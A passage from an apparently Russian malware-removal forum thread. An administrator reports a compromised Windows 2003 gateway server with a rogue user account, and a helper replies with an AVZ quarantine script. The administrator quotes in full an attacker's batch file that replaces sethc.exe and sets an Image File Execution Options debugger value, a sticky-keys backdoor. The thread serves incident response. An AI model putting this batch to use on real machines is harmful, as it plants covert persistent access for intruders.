у меня по ходу мой серевр инета взломали, который раздает инет на пару десятков компов
Windows 2003, UserGate 2.8, RAdmin 2.1.
щас проверяю антивирусом cureit
нашло заразу у нового пользователя windows first(я его не создавал)
в каталоге пользователя first лежит батник 1.bat и файл 222.exe
текст батника:
copy 222.exe %systemroot%\system32\dllcache\sethc.exe & copy 222.exe %systemroot%\system32\sethc.exe & copy 222.exe %systemroot%\Cluster\222.exe
echo Windows Registry Editor Version 5.00 >1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] >>1.reg
echo "debugger"="c:\\windows\\Cluster\\222.exe" >>1.reg
regedit /s 1.reg
del 1.reg
а также в каталоге пользователя C:\Documents and Settings\First\
rad.exe (Program.RemoteAdmin Контейнер содержит инфицированные объекты) - cureit его переместил
Посмотрите лог. Что там желательно сделать чтобы улучшить безопасность?
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Мы будем Вам очень признательны, если Вы прочтёте и в точности выполните наши несложные правила.
В противном случае мы никак не сможем быть Вам полезны.
просто не охота перезагружать комп после проверки авз-ом еще раз
В процессе лечения обязательно придется перегружаться, причем неоднократно.
Найдите возможность, выполнить правила, если хотите, чтобы Вам помогли вылечить систему.
begin
QuarantineFile('C:\WINDOWS\system32\umxw.dll','');
QuarantineFile('C:\WINDOWS\system32\umxtrw.dll','');
QuarantineFile('C:\WINDOWS\system32\umxexw.dll','');
end.
Пришлите карантин согласно Приложения 3 правил по красной ссылке Прислать запрошенный карантин вверху темы
Microsoft MVP 2012-2016 Consumer Security Microsoft MVP 2016 Reconnect
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: